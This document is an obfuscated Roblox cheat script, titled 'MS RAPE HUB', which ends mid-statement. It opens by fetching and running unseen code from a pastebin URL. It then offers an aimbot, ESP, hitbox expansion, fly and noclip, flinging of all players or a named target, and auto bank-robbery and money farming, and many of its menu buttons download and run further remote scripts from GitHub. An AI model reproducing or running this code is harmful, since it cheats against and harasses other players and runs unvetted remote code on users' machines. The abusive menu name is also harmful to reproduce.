--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

loadstring(game:HttpGet("https://pastebin.com/raw/g0e2ZWSe"))();

wait(3)

local v0="1.3F";local v1=2988554876;if (game.PlaceId~=v1) then return;end local v2=game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/version.txt",true);print("Latest version:",v2);print("Script version:",v0);if (v2:gsub("\n","")~=v0) then local v183=0 -0 ;while true do if (v183==(0 + 0)) then warn("The script is outdated, dm legendary_moose_25426 for the latest version!");return;end end end print("Script is up to date, RUNNING.");warn("ERROR WITH BoostClientTrigger");wait(0.1 -0 );warn("ERROR WITH AntiCheatBait");wait(0.4 + 0 );warn("ERROR WITH AntiCheatTriggerWarning");wait(0.2);warn("ERROR WITH ClientServerTrigger");wait(3 -2 );print("Loading...");local v3,v4=pcall(function() return loadstring(game:HttpGet("https://sirius.menu/rayfield"))();end);local v5=v4:CreateWindow({Name="MS RAPE HUB",Icon=1747 -(760 + 987) ,LoadingTitle="MS TOTAL RAPE",LoadingSubtitle="BY legendary_moose_25426",Theme="Default",DisableRayfieldPrompts=false,DisableBuildWarnings=true,KeySystem=true,KeySettings={Title="KEY SYSTEM",Subtitle="SKIBIDI",Note="DM legendary_moose_25426 FOR THE KEY",FileName="Key",SaveKey=true,GrabKeyFromSite=false,Key={"53KuYsMSRAPER2999"}}});local v6=v5:CreateTab("Aimbot");local v7=v6:CreateSection("Mouse Lock");local v8=game:GetService("UserInputService");local v9=game:GetService("Players");local v10=game:GetService("RunService");local v11=game:GetService("Workspace");local v12={Settings={Enabled=false,ManualActivation=false,Key="Q",Prediction=0,AimPart="HumanoidRootPart"}};local v13=v9.LocalPlayer;local v14=v13:GetMouse();local v15=v11.CurrentCamera;local v16;function FindClosestPlayer() local v83=nil;local v84=math.huge;for v184,v185 in pairs(v9:GetPlayers()) do if ((v185~=v13) and v185.Character and v185.Character:FindFirstChild("Humanoid") and v185.Character:FindFirstChild(v12.Settings.AimPart)) then local v249=v185.Character.Humanoid;local v250=v185.Character[v12.Settings.AimPart];if (v249.Health>(766 -(745 + 21))) then local v301=0;local v302;local v303;while true do if (v301==(0 + 0)) then v302=v15:WorldToViewportPoint(v250.Position);v303=(Vector2.new(v302.X,v302.Y) -Vector2.new(v14.X,v14.Y)).Magnitude;v301=1;end if (v301==(2 -1)) then if (v303<v84) then v83=v185;v84=v303;end break;end end end end end return v83;end local v17=v6:CreateToggle({Name="Mouse Lock",CurrentValue=false,Flag="MouseLockToggle",Callback=function(v85) v12.Settings.ManualActivation=v85;end});local v18=v6:CreateKeybind({Name="Mouse Lock Keybind",CurrentKeybind="Q",HoldToInteract=false,Flag="MouseLockKeybind",Callback=function(v87) if v12.Settings.ManualActivation then local v215=0 -0 ;while true do if (v215==(0 + 0)) then v12.Settings.Enabled= not v12.Settings.Enabled;if v12.Settings.Enabled then v16=FindClosestPlayer();else v16=nil;end break;end end end end});v8.InputBegan:Connect(function(v88,v89) local v90=0 + 0 ;while true do if (v90==(1055 -(87 + 968))) then if v89 then return;end if ((v88.KeyCode==Enum.KeyCode[v12.Settings.Key]) and v12.Settings.ManualActivation) then local v305=0 -0 ;while true do if (v305==0) then v12.Settings.Enabled= not v12.Settings.Enabled;if v12.Settings.Enabled then v16=FindClosestPlayer();else v16=nil;end break;end end end break;end end end);v10.RenderStepped:Connect(function() if (v12.Settings.Enabled and v16 and v16.Character and v16.Character:FindFirstChild(v12.Settings.AimPart)) then local v216=0 + 0 ;local v217;local v218;local v219;local v220;while true do if (v216==0) then v217=v16.Character[v12.Settings.AimPart];v218=v217.Velocity * v12.Settings.Prediction ;v216=1;end if (v216==(2 -1)) then v219,v220=v15:WorldToScreenPoint(v217.Position + v218 );if v220 then mousemoverel(v219.X-v14.X ,v219.Y-v14.Y );end break;end end end end);local v7=v6:CreateSection("Camera Lock");getgenv().AimPart="HumanoidRootPart";getgenv().FOV=true;getgenv().ShowFOV=false;getgenv().FOVSize=55;local v9=game:GetService("Players");local v23=game:GetService("RunService");local v24=game:GetService("Workspace");local v25=game:GetService("GuiService");local v26=v9.LocalPlayer;local v14=v26:GetMouse();local v27=v24.CurrentCamera;local v28=v25.GetGuiInset;local v29=false;local v30=false;local v31;if getgenv().Loaded then return;end getgenv().Loaded=true;getgenv().MouseLock=getgenv().MouseLock or {Settings={Enabled=false,ManualActivation=false}} ;local v34=Drawing.new("Circle");v34.Filled=false;v34.Transparency=1414 -(447 + 966) ;v34.Thickness=2 -1 ;v34.Color=Color3.fromRGB(255,255,0);v34.NumSides=2817 -(1703 + 114) ;local function v40() if getgenv().FOV then v34.Radius=getgenv().FOVSize * 2 ;v34.Visible=getgenv().ShowFOV;v34.Position=Vector2.new(v14.X,v14.Y + v28(v25).Y );end end local function v41() if  not v29 then return nil;end local v91;local v92=math.huge;for v186,v187 in pairs(v9:GetPlayers()) do if ((v187~=v26) and v187.Character and v187.Character:FindFirstChild("Humanoid") and v187.Character:FindFirstChild(getgenv().AimPart)) then local v251=v187.Character.Humanoid;local v252=v187.Character[getgenv().AimPart];if ((v251.Health>0) and  not v187.Character:FindFirstChild("GRABBING_CONSTRAINT")) then local v307,v308=v27:WorldToViewportPoint(v252.Position);local v309=(Vector2.new(v307.X,v307.Y) -Vector2.new(v14.X,v14.Y)).Magnitude;if (v308 and ((getgenv().FOV and (v309<v34.Radius)) or  not getgenv().FOV) and (v309<v92)) then v91=v187;v92=v309;end end end end return v91;end local v42=v6:CreateToggle({Name="Camera Lock",CurrentValue=false,Flag="CamLock",Callback=function(v93) local v94=701 -(376 + 325) ;while true do if (0==v94) then v29=v93;if  not v93 then v30=false;v31=nil;end break;end end end});local v18=v6:CreateKeybind({Name="Aimlock Keybind",CurrentKeybind="Q",HoldToInteract=false,Flag="Keybind1",Callback=function() if v29 then local v225=0 -0 ;while true do if (v225==(0 -0)) then v30= not v30;v31=(v30 and v41()) or nil ;break;end end end end});v23.RenderStepped:Connect(function() v40();if (v29 and v30 and v31) then local v226=v31.Character and v31.Character:FindFirstChild(getgenv().AimPart) ;if v226 then v27.CFrame=CFrame.new(v27.CFrame.Position,v226.Position);end end end);local v6=v5:CreateTab("ESP");local v7=v6:CreateSection("ESP");local v27=workspace.CurrentCamera;local v9=game:GetService("Players");local v10=game:GetService("RunService");local v13=v9.LocalPlayer;local v43=false;local function v44(v95) if (v95==v13) then return;end local v96={TopLeft=Drawing.new("Line"),TopRight=Drawing.new("Line"),BottomLeft=Drawing.new("Line"),BottomRight=Drawing.new("Line"),Left=Drawing.new("Line"),Right=Drawing.new("Line"),Top=Drawing.new("Line"),Bottom=Drawing.new("Line")};for v188,v189 in pairs(v96) do v189.Visible=false;v189.Color=Color3.fromRGB(73 + 182 ,54 -29 ,39 -(9 + 5) );v189.Thickness=377 -(85 + 291) ;end return v96;end local function v45(v97,v98,v99) if  not v43 then for v253,v254 in pairs(v97) do v254.Visible=false;end return;end local v100={};for v193,v194 in pairs(v98:GetChildren()) do if v194:IsA("BasePart") then table.insert(v100,v194.Position);end end if ( #v100==(1265 -(243 + 1022))) then return;end local v101,v102,v103,v104=math.huge,math.huge, -math.huge, -math.huge;for v195,v196 in pairs(v100) do local v197=0;local v198;local v199;while true do if (0==v197) then v198,v199=v27:WorldToViewportPoint(v196);if v199 then local v314=0 -0 ;while true do if (v314==0) then v101=math.min(v101,v198.X);v102=math.min(v102,v198.Y);v314=1;end if (v314==(1 + 0)) then v103=math.max(v103,v198.X);v104=math.max(v104,v198.Y);break;end end end break;end end end if (v101==math.huge) then for v256,v257 in pairs(v97) do v257.Visible=false;end return;end local v105=Vector2.new(v101-(1190 -(1123 + 57)) ,v102-(9 + 1) );local v106=Vector2.new((v103-v101) + (274 -(163 + 91)) ,(v104-v102) + (1950 -(1869 + 61)) );local v107=v106.X * 0.2 ;v97.TopLeft.From=v105;v97.TopLeft.To=v105 + Vector2.new(v107,0 + 0 ) ;v97.TopLeft.Visible=true;v97.TopRight.From=v105 + Vector2.new(v106.X,0 -0 ) ;v97.TopRight.To=v105 + Vector2.new(v106.X-v107 ,0 -0 ) ;v97.TopRight.Visible=true;v97.BottomLeft.From=v105 + Vector2.new(0 + 0 ,v106.Y) ;v97.BottomLeft.To=v105 + Vector2.new(v107,v106.Y) ;v97.BottomLeft.Visible=true;v97.BottomRight.From=v105 + Vector2.new(v106.X,v106.Y) ;v97.BottomRight.To=v105 + Vector2.new(v106.X-v107 ,v106.Y) ;v97.BottomRight.Visible=true;v97.Left.From=v105;v97.Left.To=v105 + Vector2.new(0 -0 ,v107) ;v97.Left.Visible=true;v97.Right.From=v105 + Vector2.new(v106.X,0 + 0 ) ;v97.Right.To=v105 + Vector2.new(v106.X,v107) ;v97.Right.Visible=true;v97.Top.From=v105 + Vector2.new(1474 -(1329 + 145) ,v106.Y) ;v97.Top.To=v105 + Vector2.new(971 -(140 + 831) ,v106.Y-v107 ) ;v97.Top.Visible=true;v97.Bottom.From=v105 + Vector2.new(v106.X,v106.Y) ;v97.Bottom.To=v105 + Vector2.new(v106.X,v106.Y-v107 ) ;v97.Bottom.Visible=true;for v200,v201 in pairs(v97) do local v202=1850 -(1409 + 441) ;while true do if (v202==(718 -(15 + 703))) then v201.Color=v99;v201.Thickness=1 + 0 ;break;end end end end local v46={};for v132,v133 in pairs(v9:GetPlayers()) do if ((v133~=v13) and v133.Character) then v46[v133]=v44(v133);end end v10.RenderStepped:Connect(function() for v203,v204 in pairs(v9:GetPlayers()) do if ((v204~=v13) and v204.Character and v46[v204]) then v45(v46[v204],v204.Character,Color3.fromRGB(693 -(262 + 176) ,25,25));end end end);v9.PlayerAdded:Connect(function(v134) v134.CharacterAdded:Connect(function() v46[v134]=v44(v134);end);end);v9.PlayerRemoving:Connect(function(v135) if v46[v135] then for v259,v260 in pairs(v46[v135]) do v260:Remove();end v46[v135]=nil;end end);local v47=v6:CreateToggle({Name="Box ESP",CurrentValue=false,Flag="BoxESP",Callback=function(v136) v43=v136;end});local v6=v5:CreateTab("Misc");local v7=v6:CreateSection("Character/Game");local v48=v6:CreateButton({Name="Chat Spy",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/chat%20view"))();end});local v48=v6:CreateButton({Name="Infinite Jump",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/infinite%20jump"))();end});local v48=v6:CreateButton({Name="Reset Character",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/resetchar"))();end});local v48=v6:CreateButton({Name="Rejoin Game",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/rejoin"))();end});local v48=v6:CreateButton({Name="Remove Lag",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/FPS%20NO%20LAG%20SCRIPT.txt"))();end});local v7=v6:CreateSection("Scripts");local v48=v6:CreateButton({Name="Infinite Yield",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/infiniteyield"))();end});local v48=v6:CreateButton({Name="Dark Dex",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/dexnew"))();end});local v48=v6:CreateButton({Name="Dark Dex (WITH DECOMPILER)",Callback=function() print("Loading the Luau Decompiler...");local v137=math.random(400,2621 -(345 + 1376) )/(1688 -(198 + 490)) ;task.wait(v137);loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/dex"))();print(string.format("Successfully loaded the Luau Decompiler in %.2f seconds",v137));end});local v6=v5:CreateTab("Character");local v7=v6:CreateSection("Character");local v9=game:GetService("Players");local v13=v9.LocalPlayer;local function v49(v138) local v139=v13.Character or v13.CharacterAdded:Wait() ;local v140=v139:FindFirstChildOfClass("Humanoid");if v140 then v140.WalkSpeed=v138;end end local v50=v6:CreateSlider({Name="Character Speed",Range={38 -22 ,629 -329 },Increment=1263 -(1091 + 171) ,Suffix="Speed",CurrentValue=3 + 13 ,Callback=function(v141) v49(v141);end});v13.CharacterAdded:Connect(function(v142) v142:WaitForChild("Humanoid").WalkSpeed=v50.CurrentValue;end);local v9=game:GetService("Players");local v13=v9.LocalPlayer;local function v51(v145) local v146=v13.Character or v13.CharacterAdded:Wait() ;local v147=v146:FindFirstChildOfClass("Humanoid");if v147 then v147.JumpPower=v145;end end local v50=v6:CreateSlider({Name="Character JumpPower",Range={165 -115 ,1490 -1190 },Increment=699 -(208 + 490) ,Suffix="JumpPower",CurrentValue=50,Callback=function(v148) v51(v148);end});v13.CharacterAdded:Connect(function(v149) v149:WaitForChild("Humanoid").JumpPower=v50.CurrentValue;end);local v7=v6:CreateSection("HBE");local v17=v6:CreateToggle({Name="Toggle HBE",CurrentValue=false,Flag="Toggle1",Callback=function(v152) _G.Disabled=v152;end});_G.HeadSize=2 + 10 ;_G.Disabled=false;game:GetService("RunService").RenderStepped:Connect(function() if _G.Disabled then for v261,v262 in next,game:GetService("Players"):GetPlayers() do if (v262.Name~=game:GetService("Players").LocalPlayer.Name) then pcall(function() v262.Character.HumanoidRootPart.Size=Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize);v262.Character.HumanoidRootPart.Transparency=0.5 + 0 ;v262.Character.HumanoidRootPart.BrickColor=BrickColor.new("Really blue");v262.Character.HumanoidRootPart.Material="Neon";v262.Character.HumanoidRootPart.CanCollide=false;end);end end else for v263,v264 in next,game:GetService("Players"):GetPlayers() do if (v264.Name~=game:GetService("Players").LocalPlayer.Name) then pcall(function() local v320=836 -(660 + 176) ;while true do if (v320==(1 + 0)) then v264.Character.HumanoidRootPart.BrickColor=BrickColor.new("Medium stone grey");v264.Character.HumanoidRootPart.Material="Plastic";v320=2;end if (v320==(204 -(14 + 188))) then v264.Character.HumanoidRootPart.CanCollide=true;break;end if (v320==0) then v264.Character.HumanoidRootPart.Size=Vector3.new(677 -(534 + 141) ,1 + 1 ,1 + 0 );v264.Character.HumanoidRootPart.Transparency=0 + 0 ;v320=1 -0 ;end end end);end end end end);local v50=v6:CreateSlider({Name="HBE Size",Range={2 -0 ,27 + 23 },Increment=1,Suffix="Size",CurrentValue=_G.HeadSize,Flag="SliderHBE",Callback=function(v153) _G.HeadSize=v153;end});local v7=v6:CreateSection("FLY");local v9=game:GetService("Players");local v10=game:GetService("RunService");local v8=game:GetService("UserInputService");local v13=v9.LocalPlayer;local v52=v13.Character or v13.CharacterAdded:Wait() ;local v53=v52:WaitForChild("Humanoid");local v54=v52:WaitForChild("HumanoidRootPart");local v55=50;local v56=false;local v57=Instance.new("BodyVelocity");v57.MaxForce=Vector3.new(63672 + 36328 ,100396 -(115 + 281) ,100000);local v59=Instance.new("BodyGyro");v59.MaxTorque=Vector3.new(232603 -132603 ,82795 + 17205 ,241675 -141675 );local function v61() if (v56 or  not v54) then return;end v56=true;v57.Parent=v54;v59.Parent=v54;v53.PlatformStand=true;end local function v62() local v157=0;while true do if (v157==0) then v56=false;v57.Parent=nil;v157=3 -2 ;end if (v157==(868 -(550 + 317))) then v59.Parent=nil;v53.PlatformStand=false;break;end end end v13.CharacterAdded:Connect(function(v158) v52=v158;v53=v52:WaitForChild("Humanoid");v54=v52:WaitForChild("HumanoidRootPart");v62();end);v10.RenderStepped:Connect(function() if (v56 and v54) then local v231=Vector3.zero;if v8:IsKeyDown(Enum.KeyCode.W) then v231+=workspace.CurrentCamera.CFrame.LookVector end if v8:IsKeyDown(Enum.KeyCode.S) then v231-=workspace.CurrentCamera.CFrame.LookVector end if v8:IsKeyDown(Enum.KeyCode.A) then v231-=workspace.CurrentCamera.CFrame.RightVector end if v8:IsKeyDown(Enum.KeyCode.D) then v231+=workspace.CurrentCamera.CFrame.RightVector end if (v231.Magnitude>(0 -0)) then v57.Velocity=v231.Unit * v55 ;else v57.Velocity=Vector3.zero;end v59.CFrame=v54.CFrame;end end);local v47=v6:CreateToggle({Name="Toggle Fly",CurrentValue=false,Flag="Fly",Callback=function(v159) if v159 then v61();else v62();end end});local v63=v6:CreateSlider({Name="Fly Speed",Range={139 -89 ,1000},Increment=5,Suffix="Speed",CurrentValue=v55,Flag="FlySpeed",Callback=function(v160) v55=v160;end});local v64=nil;local v65=nil;function noclip() local v161=0;local v162;while true do if (v161==(285 -(134 + 151))) then v65=false;v162=nil;v161=1;end if ((1666 -(970 + 695))==v161) then function v162() local v298=0 -0 ;local v299;while true do if (v298==0) then v299=game:GetService("Players").LocalPlayer;if ((v65==false) and v299 and v299.Character) then for v352,v353 in pairs(v299.Character:GetDescendants()) do if (v353:IsA("BasePart") and v353.CanCollide and (v353.Name~=floatName)) then v353.CanCollide=false;end end end v298=1991 -(582 + 1408) ;end if (v298==(3 -2)) then wait(0.21 -0 );break;end end end v64=game:GetService("RunService").Stepped:Connect(v162);break;end end end function clip() local v163=0 -0 ;while true do if (v163==0) then if v64 then v64:Disconnect();end v65=true;break;end end end local v17=v6:CreateToggle({Name="Toggle Noclip",CurrentValue=false,Flag="noclip",Callback=function(v164) if v164 then noclip();else clip();end end});local v7=v6:CreateSection("Character Neon");local v9=game:GetService("Players");local v66=v9.LocalPlayer;local function v67(v165,v166) if  not v165 then return;end for v206,v207 in ipairs(v165:GetDescendants()) do if v207:IsA("BasePart") then local v268=1824 -(1195 + 629) ;while true do if (v268==(0 -0)) then v207.Material=Enum.Material.Neon;v207.Color=v166;break;end end elseif (v207:IsA("Decal") or v207:IsA("Texture")) then v207:Destroy();end end for v208,v209 in ipairs(v165:GetChildren()) do if (v209:IsA("Shirt") or v209:IsA("Pants") or v209:IsA("ShirtGraphic")) then v209:Destroy();end end end local v68=Color3.fromRGB(255,496 -(187 + 54) ,1035 -(162 + 618) );local v17=v6:CreateToggle({Name="Neon Toggle",CurrentValue=false,Flag="ToggleNeonWhite",Callback=function(v167) if v167 then local v234=0 + 0 ;while true do if (v234==(0 + 0)) then if v66.Character then v67(v66.Character,v68);end v66.CharacterAppearanceLoaded:Connect(function(v324) v67(v324,v68);end);break;end end else v66:LoadCharacter();end end});local v69=v6:CreateColorPicker({Name="Neon Picker",Color=v68,Flag="ColorPicker1",Callback=function(v168) v68=v168;if (v17.CurrentValue and v66.Character) then v67(v66.Character,v68);end end});local v6=v5:CreateTab("Teleport");local v7=v6:CreateSection("Teleport Player");local v48=v6:CreateButton({Name="GunShop Teleport",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/gunshopteleport"))();end});local v48=v6:CreateButton({Name="Bank Teleport",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/bankteleport"))();end});local v48=v6:CreateButton({Name="Jewelry Teleport",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/jewshop"))();end});local v7=v6:CreateSection("Teleport Exploits");local v48=v6:CreateButton({Name="Bring the city smuggler to the spawn",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/smuggler"))();end});local v48=v6:CreateButton({Name="Bring the gun store guy near the smuggler (fixing rn)",Callback=function() loadstring(game:HttpGet("https://raw.githubusercontent.com/skdibiidirizxllerohio3127564/skuyews/refs/heads/main/shop%20tp"))();end});local v6=v5:CreateTab("Fling");local v7=v6:CreateSection("Fling All");local v17=v6:CreateToggle({Name="Fling All",CurrentValue=false,Flag="FlingALL",Callback=function(v169) if v169 then _G.FLYING=true;local v235=game:GetService("Players").LocalPlayer;local v236=v235.Character or v235.CharacterAdded:Wait() ;local v237=v236:FindFirstChildOfClass("Humanoid");local v238=v236:FindFirstChild("HumanoidRootPart");if ( not v237 or  not v238) then return;end local v239=((v237.RigType==Enum.HumanoidRigType.R6) and v236:FindFirstChild("Torso")) or v236:FindFirstChild("UpperTorso") ;if  not v239 then return;end local v240={F=0,B=0 -0 ,L=0,R=0};local v241=8 -3 ;local v242=v235:GetMouse();local function v243() local v269=Instance.new("BodyGyro",v239);local v270=Instance.new("BodyVelocity",v239);v269.P=7037 + 82963 ;v269.maxTorque=Vector3.new(9000001124 -(1373 + 263) ,9000000488 -(451 + 549) ,8999999488 -0 );v269.cframe=v239.CFrame;v270.velocity=Vector3.new(1587 -(412 + 1175) ,0.1,0);v270.maxForce=Vector3.new(8999999488,8999999488 -0 ,8999999488 -0 );spawn(function() local v300=341 -(218 + 123) ;while true do if ((1582 -(1535 + 46))==v300) then v270:Destroy();v237.PlatformStand=false;break;end if (v300==(0 + 0)) then repeat local v341=0 + 0 ;while true do if (v341==(561 -(306 + 254))) then v270.velocity=Vector3.new(0 + 0 ,0.1 -0 ,1467 -(899 + 568) );v269.cframe=game.Workspace.CurrentCamera.CFrame;break;end if (v341==(0 + 0)) then wait();v237.PlatformStand=true;v341=2 -1 ;end end until  not _G.FLYING v269:Destroy();v300=1;end end end);end v243();game:GetService("RunService").Stepped:Connect(function() if (v236 and v237) then for v325,v326 in pairs(v236:GetChildren()) do if v326:IsA("BasePart") then v326.CanCollide=false;end end end end);wait(603.1 -(268 + 335) );local v244=Instance.new("BodyThrust");v244.Parent=v238;v244.Force=Vector3.new(50290 -(60 + 230) ,0,50000);v244.Location=v238.Position;while _G.FLYING do local v277=game:GetService("Players"):GetPlayers();if ( #v277>1) then local v310=nil;repeat v310=v277[math.random(573 -(426 + 146) , #v277)];until (v310~=v235) and v310.Character and v310.Character:FindFirstChild("HumanoidRootPart")  if (v310 and v310.Character) then local v333=0 + 0 ;local v334;while true do if (v333==(1456 -(282 + 1174))) then v334=v310.Character.HumanoidRootPart;if ((math.abs(v334.Position.X)<=(1811 -(569 + 242))) and (math.abs(v334.Position.Y)<=1000) and (math.abs(v334.Position.Z)<=1000)) then local v363=0 -0 ;while true do if (v363==(0 + 0)) then v238.CFrame=v334.CFrame;wait(0.2);break;end end end break;end end end end end else _G.FLYING=false;end end});local v50=v6:CreateSlider({Name="Fling Speed",Range={1256 -(721 + 530) ,249 -149 },Increment=5 + 0 ,Suffix="Speed",CurrentValue=705 -(271 + 429) ,Flag="Flingspeed",Callback=function(v170) SPEED=v170;end});local v7=v6:CreateSection("Fling Individual");local v70={Target=""};local v9=game:GetService("Players");local v10=game:GetService("RunService");local v13=v9.LocalPlayer;local v71=Instance.new("BodyAngularVelocity");v71.AngularVelocity=Vector3.new(10^(6 + 0) ,(1510 -(1408 + 92))^(1092 -(461 + 625)) ,(1298 -(993 + 295))^6 );v71.MaxTorque=Vector3.new(10^(1 + 5) ,10^(1177 -(418 + 753)) ,(4 + 6)^6 );v71.P=(2 + 8)^6 ;local v75=false;local function v76(v171) local v172=v9:FindFirstChild(v171);if  not v172 then return;end v71.Parent=v13.Character.HumanoidRootPart;v75=true;while v75 and v172.Character.HumanoidRootPart and v13.Character.HumanoidRootPart  do v10.RenderStepped:Wait();v13.Character.HumanoidRootPart.CFrame=v172.Character.HumanoidRootPart.CFrame * v13.Character.HumanoidRootPart.CFrame.Rotation ;v13.Character.HumanoidRootPart.Velocity=Vector3.new();end end local function v77() local v175=0 + 0 ;while true do if (v175==1) then v13.Character.HumanoidRootPart.Velocity=Vector3.new();break;end if ((0 + 0)==v175) then v75=false;v71.Parent=nil;v175=530 -(406 + 123) ;end end end local v17=v6:CreateToggle({Name="Toggle Fling",CurrentValue=false,Flag="Toggle1",Callback=function(v176) if v176 then v76(v70.Target);else v77();end end});local v78=v6:CreateInput({Name="Target Username",CurrentValue="",PlaceholderText="Enter Username",RemoveTextAfterFocusLost=false,Flag="Input1",Callback=function(v177) v70.Target=v177;end});local v6=v5:CreateTab("VULNS");local v7=v6:CreateSection("Money farm (USE IN A PRIVATE SERVER)");local v9=game:GetService("Players");local v66=v9.LocalPlayer;local v79=workspace.Map:FindFirstChild("CityRubbish");local v80=false;if  not v79 then local v212=1769 -(1749 + 20) ;while true do if (v212==(0 + 0)) then warn("City rubbish was not found.");return;end end end print("City rubbish folder found.");local function v81() while v80 do local v213=1322 -(1249 + 73) ;local v214;while true do if (0==v213) then v214=v79:GetChildren();if ( #v214==(0 + 0)) then local v328=1145 -(466 + 679) ;while true do if (0==v328) then print("[âœ…] All CityRubbish picked up! Stopping script.");v80=false;v328=2 -1 ;end if (v328==1) then return;end end end v213=2 -1 ;end if (v213==1) then for v311,v312 in ipairs(v214) do local v313=1900 -(106 + 1794) ;while true do if (v313==(0 + 0)) then if  not v80 then return;end if (v312:IsA("BasePart") or v312:IsA("Model")) then local v355=0;local v356;local v357;while true do if (v355==2) then if v357 then local v367=0;while true do if (v367==2) then task.wait(0.1 + 0 );v357:InputHoldEnd();break;end if (v367==(2 -1)) then task.wait(0.2 -0 );v357:InputHoldBegin();v367=116 -(4 + 110) ;end if (v367==(584 -(57 + 527))) then print("[â³] Found ProximityPrompt, starting...");v357.HoldDuration=1427 -(41 + 1386) ;v367=104 -(17 + 86) ;end end else warn("[âš ï¸] No ProximityPrompt found in:",v312.Name);end task.wait(0.1 + 0 );break;end if (v355==(1 -0)) then if (v356 and v356:FindFirstChild("HumanoidRootPart")) then v356.HumanoidRootPart.CFrame=v312:GetPivot() + Vector3.new(0 -0 ,3,166 -(122 + 44) ) ;end v357=v312:FindFirstChildOfClass("ProximityPrompt");v355=2 -0 ;end if (v355==0) then print("[ðŸš€] Teleporting to:",v312.Name);v356=v66.Character;v355=3 -2 ;end end end break;end end end task.wait(1 + 0 );break;end end end end local v17=v6:CreateToggle({Name="Farm shit from the floor (USE IN A PRIVATE SERVER)",CurrentValue=false,Flag="farmshit",Callback=function(v179) local v180=0 + 0 ;while true do if (v180==0) then v80=v179;if v80 then print("[âœ…] Farming started!");v81();else print("[ðŸ›‘] Farming stopped!");end break;end end end});local v17=v6:CreateToggle({Name="Auto Rob Bank (USE IN A PRIVATE SERVER)",CurrentValue=false,Flag="bankrob",Callback=function(v181) v80=v181;if v80 then print("[âœ…] Farming started!");while v80 do local v280=0;local v281;local v282;local v283;local v284;local v285;while true do if (v280==(0 -0)) then v281=game:GetService("Players").LocalPlayer;v282=v281.Character or v281.CharacterAdded:Wait() ;v280=66 -(30 + 35) ;end if (v280==3) then v285={CFrame.new( -(286.68811 + 129),1279.1498184 -(1043 + 214) , -(3527.853027 -2594), -1,1212 -(323 + 889) ,0 -0 ,0,581 -(361 + 219) ,320 -(53 + 267) ,0 + 0 ,0, -(414 -(15 + 398))),CFrame.new( -(937.78624 -688),15.0127907, -657.555786, -1,0 + 0 ,0 + 0 ,850 -(20 + 830) , -1,0,0,0 + 0 ,127 -(116 + 10) ),CFrame.new( -(1.9685707099999998 + 5),754.3632183 -(542 + 196) , -(1825.863953 -973),0 + 0 ,0, -1,0, -1,0 + 0 , -(1 + 0),0 -0 ,0 -0 ),CFrame.new( -56.9724388,422.3612785 -(118 + 287) , -(2461.802673 -1833),1121 -(118 + 1003) ,0 -0 , -(378 -(142 + 235)),0 -0 , -(1 + 0),977 -(553 + 424) , -(1 -0),0,0 + 0 ),CFrame.new( -110.118019,15.5799847, -1107.20715,0 + 0 ,0 + 0 , -(1 + 0),0 -0 , -(2 -1),0 -0 , -(1 + 0),0 -0 ,0),CFrame.new( -(20.9724388 + 36),17.3612785, -(1985.91217 -(797 + 532)),0 + 0 ,0 + 0 , -(2 -1),1202 -(373 + 829) , -(732 -(476 + 255)),0, -(1131 -(369 + 761)),0,0 + 0 ),CFrame.new( -(101.97243879999999 -45),17.3612785, -(1297.0615229999999 -612),238 -(64 + 174) ,0, -(1 + 0),0, -1,0 -0 , -(337 -(144 + 192)),216 -(42 + 174) ,0 + 0 ),CFrame.new( -(95.331421 + 128),1519.0127907 -(363 + 1141) , -656.215271, -(1581 -(1183 + 397)),0 -0 ,0 + 0 ,0, -1,0 + 0 ,0,0,1976 -(1913 + 62) ),CFrame.new( -(738.390472 -459),1948.0127907 -(565 + 1368) , -657.555786, -(3 -2),1661 -(1477 + 184) ,0 -0 ,0 + 0 , -(857 -(564 + 292)),0 -0 ,0 -0 ,304 -(244 + 60) ,1 + 0 ),CFrame.new( -56.9724388,1018.3612785 -(938 + 63) , -(461.321777 + 138),0,0, -1,1125 -(936 + 189) , -1,0, -(1 + 0),1613 -(1565 + 48) ,0),CFrame.new( -56.9724388,11.361278500000001 + 6 , -685.061523,0,0, -(1139 -(782 + 356)),267 -(176 + 91) , -1,0 -0 , -(1 -0),1092 -(975 + 117) ,0)};for v335,v336 in ipairs(v285) do if v283 then v283.CFrame=v336;end wait(1875.5 -(157 + 1718) );end break;end if (v280==(2 + 0)) then if v284 then v284.HoldDuration=0.1 -0 ;end if v284 then fireproximityprompt(v284);end v280=3;end if (v280==1) then v283=v282:FindFirstChild("HumanoidRootPart");v284=workspace.Map.Robberies.Bank.Main:FindFirstChild("ProximityPrompt",true);v280=6 -4 ;end end end else print("[ðŸ›‘] Farming stopped!");end end});local 